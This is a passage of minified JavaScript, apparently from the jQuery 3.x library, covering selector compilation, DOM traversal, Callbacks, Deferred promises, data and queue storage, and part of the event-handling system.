while(b=b[d])if(1===b.nodeType||g)if(l=b[u]||(b[u]={}),k=l[b.uniqueID]||(l[b.uniqueID]={}),e&&e===b.nodeName.toLowerCase())b=b[d]||b;else{if((j=k[f])&&j[0]===w&&j[1]===h)return m[2]=j[2];if(k[f]=m,m[2]=a(b,c,i))return!0}return!1}}function ua(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function va(a,b,c){for(var d=0,e=b.length;d<e;d++)ga(a,b[d],c);return c}function wa(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;h<i;h++)(f=a[h])&&(c&&!c(f,d,e)||(g.push(f),j&&b.push(h)));return g}function xa(a,b,c,d,e,f){return d&&!d[u]&&(d=xa(d)),e&&!e[u]&&(e=xa(e,f)),ia(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||va(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:wa(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=wa(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?I(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=wa(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):G.apply(g,r)})}function ya(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=ta(function(a){return a===b},h,!0),l=ta(function(a){return I(b,a)>-1},h,!0),m=[function(a,c,d){var e=!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d));return b=null,e}];i<f;i++)if(c=d.relative[a[i].type])m=[ta(ua(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;e<f;e++)if(d.relative[a[e].type])break;return xa(i>1&&ua(m),i>1&&sa(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(P,"$1"),c,i<e&&ya(a.slice(i,e)),e<f&&ya(a=a.slice(e)),e<f&&sa(a))}m.push(c)}return ua(m)}function za(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,o,q,r=0,s="0",t=f&&[],u=[],v=j,x=f||e&&d.find.TAG("*",k),y=w+=null==v?1:Math.random()||.1,z=x.length;for(k&&(j=g===n||g||k);s!==z&&null!=(l=x[s]);s++){if(e&&l){o=0,g||l.ownerDocument===n||(m(l),h=!p);while(q=a[o++])if(q(l,g||n,h)){i.push(l);break}k&&(w=y)}c&&((l=!q&&l)&&r--,f&&t.push(l))}if(r+=s,c&&s!==r){o=0;while(q=b[o++])q(t,u,g,h);if(f){if(r>0)while(s--)t[s]||u[s]||(u[s]=E.call(i));u=wa(u)}G.apply(i,u),k&&!f&&u.length>0&&r+b.length>1&&ga.uniqueSort(i)}return k&&(w=y,j=v),t};return c?ia(f):f}return h=ga.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=ya(b[c]),f[u]?d.push(f):e.push(f);f=A(a,za(e,d)),f.selector=a}return f},i=ga.select=function(a,b,c,e){var f,i,j,k,l,m="function"==typeof a&&a,n=!e&&g(a=m.selector||a);if(c=c||[],1===n.length){if(i=n[0]=n[0].slice(0),i.length>2&&"ID"===(j=i[0]).type&&9===b.nodeType&&p&&d.relative[i[1].type]){if(b=(d.find.ID(j.matches[0].replace(_,aa),b)||[])[0],!b)return c;m&&(b=b.parentNode),a=a.slice(i.shift().value.length)}f=V.needsContext.test(a)?0:i.length;while(f--){if(j=i[f],d.relative[k=j.type])break;if((l=d.find[k])&&(e=l(j.matches[0].replace(_,aa),$.test(i[0].type)&&qa(b.parentNode)||b))){if(i.splice(f,1),a=e.length&&sa(i),!a)return G.apply(c,e),c;break}}}return(m||h(a,n))(e,b,!p,c,!b||$.test(a)&&qa(b.parentNode)||b),c},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ja(function(a){return 1&a.compareDocumentPosition(n.createElement("fieldset"))}),ja(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||ka("type|href|height|width",function(a,b,c){if(!c)return a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ja(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||ka("value",function(a,b,c){if(!c&&"input"===a.nodeName.toLowerCase())return a.defaultValue}),ja(function(a){return null==a.getAttribute("disabled")})||ka(J,function(a,b,c){var d;if(!c)return a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),ga}(a);r.find=x,r.expr=x.selectors,r.expr[":"]=r.expr.pseudos,r.uniqueSort=r.unique=x.uniqueSort,r.text=x.getText,r.isXMLDoc=x.isXML,r.contains=x.contains,r.escapeSelector=x.escape;var y=function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&r(a).is(c))break;d.push(a)}return d},z=function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c},A=r.expr.match.needsContext;function B(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()}var C=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i,D=/^.[^:#\[\.,]*$/;function E(a,b,c){return r.isFunction(b)?r.grep(a,function(a,d){return!!b.call(a,d,a)!==c}):b.nodeType?r.grep(a,function(a){return a===b!==c}):"string"!=typeof b?r.grep(a,function(a){return i.call(b,a)>-1!==c}):D.test(b)?r.filter(b,a,c):(b=r.filter(b,a),r.grep(a,function(a){return i.call(b,a)>-1!==c&&1===a.nodeType}))}r.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?r.find.matchesSelector(d,a)?[d]:[]:r.find.matches(a,r.grep(b,function(a){return 1===a.nodeType}))},r.fn.extend({find:function(a){var b,c,d=this.length,e=this;if("string"!=typeof a)return this.pushStack(r(a).filter(function(){for(b=0;b<d;b++)if(r.contains(e[b],this))return!0}));for(c=this.pushStack([]),b=0;b<d;b++)r.find(a,e[b],c);return d>1?r.uniqueSort(c):c},filter:function(a){return this.pushStack(E(this,a||[],!1))},not:function(a){return this.pushStack(E(this,a||[],!0))},is:function(a){return!!E(this,"string"==typeof a&&A.test(a)?r(a):a||[],!1).length}});var F,G=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/,H=r.fn.init=function(a,b,c){var e,f;if(!a)return this;if(c=c||F,"string"==typeof a){if(e="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:G.exec(a),!e||!e[1]&&b)return!b||b.jquery?(b||c).find(a):this.constructor(b).find(a);if(e[1]){if(b=b instanceof r?b[0]:b,r.merge(this,r.parseHTML(e[1],b&&b.nodeType?b.ownerDocument||b:d,!0)),C.test(e[1])&&r.isPlainObject(b))for(e in b)r.isFunction(this[e])?this[e](b[e]):this.attr(e,b[e]);return this}return f=d.getElementById(e[2]),f&&(this[0]=f,this.length=1),this}return a.nodeType?(this[0]=a,this.length=1,this):r.isFunction(a)?void 0!==c.ready?c.ready(a):a(r):r.makeArray(a,this)};H.prototype=r.fn,F=r(d);var I=/^(?:parents|prev(?:Until|All))/,J={children:!0,contents:!0,next:!0,prev:!0};r.fn.extend({has:function(a){var b=r(a,this),c=b.length;return this.filter(function(){for(var a=0;a<c;a++)if(r.contains(this,b[a]))return!0})},closest:function(a,b){var c,d=0,e=this.length,f=[],g="string"!=typeof a&&r(a);if(!A.test(a))for(;d<e;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&r.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?r.uniqueSort(f):f)},index:function(a){return a?"string"==typeof a?i.call(r(a),this[0]):i.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(r.uniqueSort(r.merge(this.get(),r(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function K(a,b){while((a=a[b])&&1!==a.nodeType);return a}r.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return y(a,"parentNode")},parentsUntil:function(a,b,c){return y(a,"parentNode",c)},next:function(a){return K(a,"nextSibling")},prev:function(a){return K(a,"previousSibling")},nextAll:function(a){return y(a,"nextSibling")},prevAll:function(a){return y(a,"previousSibling")},nextUntil:function(a,b,c){return y(a,"nextSibling",c)},prevUntil:function(a,b,c){return y(a,"previousSibling",c)},siblings:function(a){return z((a.parentNode||{}).firstChild,a)},children:function(a){return z(a.firstChild)},contents:function(a){return B(a,"iframe")?a.contentDocument:(B(a,"template")&&(a=a.content||a),r.merge([],a.childNodes))}},function(a,b){r.fn[a]=function(c,d){var e=r.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=r.filter(d,e)),this.length>1&&(J[a]||r.uniqueSort(e),I.test(a)&&e.reverse()),this.pushStack(e)}});var L=/[^\x20\t\r\n\f]+/g;function M(a){var b={};return r.each(a.match(L)||[],function(a,c){b[c]=!0}),b}r.Callbacks=function(a){a="string"==typeof a?M(a):r.extend({},a);var b,c,d,e,f=[],g=[],h=-1,i=function(){for(e=e||a.once,d=b=!0;g.length;h=-1){c=g.shift();while(++h<f.length)f[h].apply(c[0],c[1])===!1&&a.stopOnFalse&&(h=f.length,c=!1)}a.memory||(c=!1),b=!1,e&&(f=c?[]:"")},j={add:function(){return f&&(c&&!b&&(h=f.length-1,g.push(c)),function d(b){r.each(b,function(b,c){r.isFunction(c)?a.unique&&j.has(c)||f.push(c):c&&c.length&&"string"!==r.type(c)&&d(c)})}(arguments),c&&!b&&i()),this},remove:function(){return r.each(arguments,function(a,b){var c;while((c=r.inArray(b,f,c))>-1)f.splice(c,1),c<=h&&h--}),this},has:function(a){return a?r.inArray(a,f)>-1:f.length>0},empty:function(){return f&&(f=[]),this},disable:function(){return e=g=[],f=c="",this},disabled:function(){return!f},lock:function(){return e=g=[],c||b||(f=c=""),this},locked:function(){return!!e},fireWith:function(a,c){return e||(c=c||[],c=[a,c.slice?c.slice():c],g.push(c),b||i()),this},fire:function(){return j.fireWith(this,arguments),this},fired:function(){return!!d}};return j};function N(a){return a}function O(a){throw a}function P(a,b,c,d){var e;try{a&&r.isFunction(e=a.promise)?e.call(a).done(b).fail(c):a&&r.isFunction(e=a.then)?e.call(a,b,c):b.apply(void 0,[a].slice(d))}catch(a){c.apply(void 0,[a])}}r.extend({Deferred:function(b){var c=[["notify","progress",r.Callbacks("memory"),r.Callbacks("memory"),2],["resolve","done",r.Callbacks("once memory"),r.Callbacks("once memory"),0,"resolved"],["reject","fail",r.Callbacks("once memory"),r.Callbacks("once memory"),1,"rejected"]],d="pending",e={state:function(){return d},always:function(){return f.done(arguments).fail(arguments),this},"catch":function(a){return e.then(null,a)},pipe:function(){var a=arguments;return r.Deferred(function(b){r.each(c,function(c,d){var e=r.isFunction(a[d[4]])&&a[d[4]];f[d[1]](function(){var a=e&&e.apply(this,arguments);a&&r.isFunction(a.promise)?a.promise().progress(b.notify).done(b.resolve).fail(b.reject):b[d[0]+"With"](this,e?[a]:arguments)})}),a=null}).promise()},then:function(b,d,e){var f=0;function g(b,c,d,e){return function(){var h=this,i=arguments,j=function(){var a,j;if(!(b<f)){if(a=d.apply(h,i),a===c.promise())throw new TypeError("Thenable self-resolution");j=a&&("object"==typeof a||"function"==typeof a)&&a.then,r.isFunction(j)?e?j.call(a,g(f,c,N,e),g(f,c,O,e)):(f++,j.call(a,g(f,c,N,e),g(f,c,O,e),g(f,c,N,c.notifyWith))):(d!==N&&(h=void 0,i=[a]),(e||c.resolveWith)(h,i))}},k=e?j:function(){try{j()}catch(a){r.Deferred.exceptionHook&&r.Deferred.exceptionHook(a,k.stackTrace),b+1>=f&&(d!==O&&(h=void 0,i=[a]),c.rejectWith(h,i))}};b?k():(r.Deferred.getStackHook&&(k.stackTrace=r.Deferred.getStackHook()),a.setTimeout(k))}}return r.Deferred(function(a){c[0][3].add(g(0,a,r.isFunction(e)?e:N,a.notifyWith)),c[1][3].add(g(0,a,r.isFunction(b)?b:N)),c[2][3].add(g(0,a,r.isFunction(d)?d:O))}).promise()},promise:function(a){return null!=a?r.extend(a,e):e}},f={};return r.each(c,function(a,b){var g=b[2],h=b[5];e[b[1]]=g.add,h&&g.add(function(){d=h},c[3-a][2].disable,c[0][2].lock),g.add(b[3].fire),f[b[0]]=function(){return f[b[0]+"With"](this===f?void 0:this,arguments),this},f[b[0]+"With"]=g.fireWith}),e.promise(f),b&&b.call(f,f),f},when:function(a){var b=arguments.length,c=b,d=Array(c),e=f.call(arguments),g=r.Deferred(),h=function(a){return function(c){d[a]=this,e[a]=arguments.length>1?f.call(arguments):c,--b||g.resolveWith(d,e)}};if(b<=1&&(P(a,g.done(h(c)).resolve,g.reject,!b),"pending"===g.state()||r.isFunction(e[c]&&e[c].then)))return g.then();while(c--)P(e[c],h(c),g.reject);return g.promise()}});var Q=/^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/;r.Deferred.exceptionHook=function(b,c){a.console&&a.console.warn&&b&&Q.test(b.name)&&a.console.warn("jQuery.Deferred exception: "+b.message,b.stack,c)},r.readyException=function(b){a.setTimeout(function(){throw b})};var R=r.Deferred();r.fn.ready=function(a){return R.then(a)["catch"](function(a){r.readyException(a)}),this},r.extend({isReady:!1,readyWait:1,ready:function(a){(a===!0?--r.readyWait:r.isReady)||(r.isReady=!0,a!==!0&&--r.readyWait>0||R.resolveWith(d,[r]))}}),r.ready.then=R.then;function S(){d.removeEventListener("DOMContentLoaded",S),
a.removeEventListener("load",S),r.ready()}"complete"===d.readyState||"loading"!==d.readyState&&!d.documentElement.doScroll?a.setTimeout(r.ready):(d.addEventListener("DOMContentLoaded",S),a.addEventListener("load",S));var T=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===r.type(c)){e=!0;for(h in c)T(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,r.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(r(a),c)})),b))for(;h<i;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},U=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function V(){this.expando=r.expando+V.uid++}V.uid=1,V.prototype={cache:function(a){var b=a[this.expando];return b||(b={},U(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase(b)]=c;else for(d in b)e[r.camelCase(d)]=b[d];return e},get:function(a,b){return void 0===b?this.cache(a):a[this.expando]&&a[this.expando][r.camelCase(b)]},access:function(a,b,c){return void 0===b||b&&"string"==typeof b&&void 0===c?this.get(a,b):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d=a[this.expando];if(void 0!==d){if(void 0!==b){Array.isArray(b)?b=b.map(r.camelCase):(b=r.camelCase(b),b=b in d?[b]:b.match(L)||[]),c=b.length;while(c--)delete d[b[c]]}(void 0===b||r.isEmptyObject(d))&&(a.nodeType?a[this.expando]=void 0:delete a[this.expando])}},hasData:function(a){var b=a[this.expando];return void 0!==b&&!r.isEmptyObject(b)}};var W=new V,X=new V,Y=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,Z=/[A-Z]/g;function $(a){return"true"===a||"false"!==a&&("null"===a?null:a===+a+""?+a:Y.test(a)?JSON.parse(a):a)}function _(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(Z,"-$&").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c=$(c)}catch(e){}X.set(a,b,c)}else c=void 0;return c}r.extend({hasData:function(a){return X.hasData(a)||W.hasData(a)},data:function(a,b,c){return X.access(a,b,c)},removeData:function(a,b){X.remove(a,b)},_data:function(a,b,c){return W.access(a,b,c)},_removeData:function(a,b){W.remove(a,b)}}),r.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=X.get(f),1===f.nodeType&&!W.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=r.camelCase(d.slice(5)),_(f,d,e[d])));W.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){X.set(this,a)}):T(this,function(b){var c;if(f&&void 0===b){if(c=X.get(f,a),void 0!==c)return c;if(c=_(f,a),void 0!==c)return c}else this.each(function(){X.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){X.remove(this,a)})}}),r.extend({queue:function(a,b,c){var d;if(a)return b=(b||"fx")+"queue",d=W.get(a,b),c&&(!d||Array.isArray(c)?d=W.access(a,b,r.makeArray(c)):d.push(c)),d||[]},dequeue:function(a,b){b=b||"fx";var c=r.queue(a,b),d=c.length,e=c.shift(),f=r._queueHooks(a,b),g=function(){r.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return W.get(a,c)||W.access(a,c,{empty:r.Callbacks("once memory").add(function(){W.remove(a,[b+"queue",c])})})}}),r.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?r.queue(this[0],a):void 0===b?this:this.each(function(){var c=r.queue(this,a,b);r._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&r.dequeue(this,a)})},dequeue:function(a){return this.each(function(){r.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=r.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=W.get(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var aa=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,ba=new RegExp("^(?:([+-])=|)("+aa+")([a-z%]*)$","i"),ca=["Top","Right","Bottom","Left"],da=function(a,b){return a=b||a,"none"===a.style.display||""===a.style.display&&r.contains(a.ownerDocument,a)&&"none"===r.css(a,"display")},ea=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};function fa(a,b,c,d){var e,f=1,g=20,h=d?function(){return d.cur()}:function(){return r.css(a,b,"")},i=h(),j=c&&c[3]||(r.cssNumber[b]?"":"px"),k=(r.cssNumber[b]||"px"!==j&&+i)&&ba.exec(r.css(a,b));if(k&&k[3]!==j){j=j||k[3],c=c||[],k=+i||1;do f=f||".5",k/=f,r.style(a,b,k+j);while(f!==(f=h()/i)&&1!==f&&--g)}return c&&(k=+k||+i||0,e=c[1]?k+(c[1]+1)*c[2]:+c[2],d&&(d.unit=j,d.start=k,d.end=e)),e}var ga={};function ha(a){var b,c=a.ownerDocument,d=a.nodeName,e=ga[d];return e?e:(b=c.body.appendChild(c.createElement(d)),e=r.css(b,"display"),b.parentNode.removeChild(b),"none"===e&&(e="block"),ga[d]=e,e)}function ia(a,b){for(var c,d,e=[],f=0,g=a.length;f<g;f++)d=a[f],d.style&&(c=d.style.display,b?("none"===c&&(e[f]=W.get(d,"display")||null,e[f]||(d.style.display="")),""===d.style.display&&da(d)&&(e[f]=ha(d))):"none"!==c&&(e[f]="none",W.set(d,"display",c)));for(f=0;f<g;f++)null!=e[f]&&(a[f].style.display=e[f]);return a}r.fn.extend({show:function(){return ia(this,!0)},hide:function(){return ia(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){da(this)?r(this).show():r(this).hide()})}});var ja=/^(?:checkbox|radio)$/i,ka=/<([a-z][^\/\0>\x20\t\r\n\f]+)/i,la=/^$|\/(?:java|ecma)script/i,ma={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ma.optgroup=ma.option,ma.tbody=ma.tfoot=ma.colgroup=ma.caption=ma.thead,ma.th=ma.td;function na(a,b){var c;return c="undefined"!=typeof a.getElementsByTagName?a.getElementsByTagName(b||"*"):"undefined"!=typeof a.querySelectorAll?a.querySelectorAll(b||"*"):[],void 0===b||b&&B(a,b)?r.merge([a],c):c}function oa(a,b){for(var c=0,d=a.length;c<d;c++)W.set(a[c],"globalEval",!b||W.get(b[c],"globalEval"))}var pa=/<|&#?\w+;/;function qa(a,b,c,d,e){for(var f,g,h,i,j,k,l=b.createDocumentFragment(),m=[],n=0,o=a.length;n<o;n++)if(f=a[n],f||0===f)if("object"===r.type(f))r.merge(m,f.nodeType?[f]:f);else if(pa.test(f)){g=g||l.appendChild(b.createElement("div")),h=(ka.exec(f)||["",""])[1].toLowerCase(),i=ma[h]||ma._default,g.innerHTML=i[1]+r.htmlPrefilter(f)+i[2],k=i[0];while(k--)g=g.lastChild;r.merge(m,g.childNodes),g=l.firstChild,g.textContent=""}else m.push(b.createTextNode(f));l.textContent="",n=0;while(f=m[n++])if(d&&r.inArray(f,d)>-1)e&&e.push(f);else if(j=r.contains(f.ownerDocument,f),g=na(l.appendChild(f),"script"),j&&oa(g),c){k=0;while(f=g[k++])la.test(f.type||"")&&c.push(f)}return l}!function(){var a=d.createDocumentFragment(),b=a.appendChild(d.createElement("div")),c=d.createElement("input");c.setAttribute("type","radio"),c.setAttribute("checked","checked"),c.setAttribute("name","t"),b.appendChild(c),o.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,b.innerHTML="<textarea>x</textarea>",o.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var ra=d.documentElement,sa=/^key/,ta=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,ua=/^([^.]*)(?:\.(.+)|)/;function va(){return!0}function wa(){return!1}function xa(){try{return d.activeElement}catch(a){}}function ya(a,b,c,d,e,f){var g,h;if("object"==typeof b){"string"!=typeof c&&(d=d||c,c=void 0);for(h in b)ya(a,h,c,d,b[h],f);return a}if(null==d&&null==e?(e=c,d=c=void 0):null==e&&("string"==typeof c?(e=d,d=void 0):(e=d,d=c,c=void 0)),e===!1)e=wa;else if(!e)return a;return 1===f&&(g=e,e=function(a){return r().off(a),g.apply(this,arguments)},e.guid=g.guid||(g.guid=r.guid++)),a.each(function(){r.event.add(this,b,e,d,c)})}r.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,n,o,p,q=W.get(a);if(q){c.handler&&(f=c,c=f.handler,e=f.selector),e&&r.find.matchesSelector(ra,e),c.guid||(c.guid=r.guid++),(i=q.events)||(i=q.events={}),(g=q.handle)||(g=q.handle=function(b){return"undefined"!=typeof r&&r.event.triggered!==b.type?r.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(L)||[""],j=b.length;while(j--)h=ua.exec(b[j])||[],n=p=h[1],o=(h[2]||"").split(".").sort(),n&&(l=r.event.special[n]||{},n=(e?l.delegateType:l.bindType)||n,l=r.event.special[n]||{},k=r.extend({type:n,origType:p,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&r.expr.match.needsContext.test(e),namespace:o.join(".")},f),(m=i[n])||(m=i[n]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,o,g)!==!1||a.addEventListener&&a.addEventListener(n,g)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),r.event.global[n]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,n,o,p,q=W.hasData(a)&&W.get(a);if(q&&(i=q.events)){b=(b||"").match(L)||[""],j=b.length;while(j--)if(h=ua.exec(b[j])||[],n=p=h[1],o=(h[2]||"").split(".").sort(),n){l=r.event.special[n]||{},n=(d?l.delegateType:l.bindType)||n,m=i[n]||[],h=h[2]&&new RegExp("(^|\\.)"+o.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&p!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,o,q.handle)!==!1||r.removeEvent(a,n,q.handle),delete i[n])}else for(n in i)r.event.remove(a,n+b[j],c,d,!0);r.isEmptyObject(i)&&W.remove(a,"handle events")}},dispatch:function(a){var b=r.event.fix(a),c,d,e,f,g,h,i=new Array(arguments.length),j=(W.get(this,"events")||{})[b.type]||[],k=r.event.special[b.type]||{};for(i[0]=b,c=1;c<arguments.length;c++)i[c]=arguments[c];if(b.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,b)!==!1){h=r.event.handlers.call(this,b,j),c=0;while((f=h[c++])&&!b.isPropagationStopped()){b.currentTarget=f.elem,d=0;while((g=f.handlers[d++])&&!b.isImmediatePropagationStopped())b.rnamespace&&!b.rnamespace.test(g.namespace)||(b.handleObj=g,b.data=g.data,e=((r.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==e&&(b.result=e)===!1&&(b.preventDefault(),b.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,b),b.result}},handlers:function(a,b){var c,d,e,f,g,h=[],i=b.delegateCount,j=a.target;if(i&&j.nodeType&&!("click"===a.type&&a.button>=1))for(;j!==this;j=j.parentNode||this)if(1===j.nodeType&&("click"!==a.type||j.disabled!==!0)){for(f=[],g={},c=0;c<i;c++)d=b[c],e=d.selector+" ",void 0===g[e]&&(g[e]=d.needsContext?r(e,this).index(j)>-1:r.find(e,this,null,[j]).length),g[e]&&f.push(d);f.length&&h.push({elem:j,handlers:f})}return j=this,i<b.length&&h.push({elem:j,handlers:b.slice(i)}),h},addProp:function(a,b){Object.defineProperty(r.Event.prototype,a,{enumerable:!0,configurable:!0,get:r.isFunction(b)?function(){if(this.originalEvent)return b(this.originalEvent)}:function(){if(this.originalEvent)return this.originalEvent[a]},set:function(b){Object.defineProperty(this,a,{enumerable:!0,configurable:!0,writable:!0,value:b})}})},fix:function(a){return a[r.expando]?a:new r.Event(a)},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==xa()&&this.focus)return this.focus(),!1},delegateType:"focusin"},blur:{trigger:function(){if(this===xa()&&this.blur)return this.blur(),!1},delegateType:"focusout"},click:{trigger:function(){if("checkbox"===this.type&&this.click&&B(this,"input"))return this.click(),!1},_default:function(a){return B(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}}},r.removeEvent=function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c)},r.Event=function(a,b){return this instanceof r.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?va:wa,this.target=a.target&&3===a.target.nodeType?a.target.parentNode:a.target,this.currentTarget=a.currentTarget,this.relatedTarget=a.relatedTarget):this.type=a,b&&r.extend(this,b),this.timeStamp=a&&a.timeStamp||r.now(),void(this[r.expando]=!0)):new r.Event(a,b)},r.Event.prototype={constructor:r.Event,isDefaultPrevented:wa,isPropagationStopped:wa,isImmediatePropagationStopped:wa,isSimulated:!1,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=va,a&&!this.isSimulated&&a.preventDefault()},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=va,a&&!this.isSimulated&&a.stopPropagation()},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=va,a&&!this.isSimulated&&a.stopImmediatePropagation(),this.stopPropagation()}},r.each({altKey:!0,bubbles:!0,cancelable:!0,changedTouches:!0,ctrlKey:!0,detail:!0,eventPhase:!0,metaKey:!0,pageX:!0,pageY:!0,shiftKey:!0,view:!0,"char":!0,charCode:!0,key:!0,keyCode:!0,button:!0,buttons:!0,clientX:!0,clientY:!0,offsetX:!0,offsetY:!0,pointerId:!0,pointerType:!0,screenX:!0,screenY:!0,targetTouches:!0,toElement:!0,touches:!0,which:function(a){var b=a.button;return null==a.which&&sa.test(a.type)?null!=a.charCode?a.charCode:a.keyCode:!a.which&&void 0!==b&&ta.test(a.type)?1&b?1:2&b?3:4&b?2:0:a.which}},r.event.addProp),r.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){r.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return e&&(e===d||r.contains(d,e))||(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),r.fn.extend({on:function(a,b,c,d){return ya(this,a,b,c,d)},one:function(a,b,c,d){return ya(this,a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return 